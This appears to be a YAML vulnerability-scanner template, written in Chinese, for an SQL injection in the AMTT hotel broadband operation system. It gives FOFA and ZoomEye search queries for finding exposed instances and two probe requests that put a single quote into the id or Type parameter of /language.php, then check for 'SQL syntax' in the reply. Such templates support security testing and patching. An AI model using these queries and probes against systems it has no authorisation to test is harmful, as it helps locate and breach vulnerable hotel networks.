漏洞描述
fofa: title="酒店宽带运营系统"
zoomeye: app="安美数字酒店宽带运营系统"
id: amtt-eflow-hsia-language-sqli
info:
name: 安美数字酒店宽带运营系统SQL注入漏洞
author: qiwentaidi
severity: high
verified: true
description: |-
fofa: title="酒店宽带运营系统"
zoomeye: app="安美数字酒店宽带运营系统"
reference:
- https://amttgroup.com/product-01-HSIA.html
tags: amtt,eflow,hsia,sqli
created: 2023/10/25
rules:
r0:
request:
method: GET
path: /language.php?Lately=&EditStatus=&Type=&Flag=edit&id='&Search=
expression: response.status == 200 && response.body.bcontains(b'SQL syntax')
r1:
request:
method: GET
path: /language.php?Lately=&EditStatus=&Type='&Flag=edit&id=&Search=
expression: response.status == 200 && response.body.bcontains(b'SQL syntax')
expression: r0() || r1()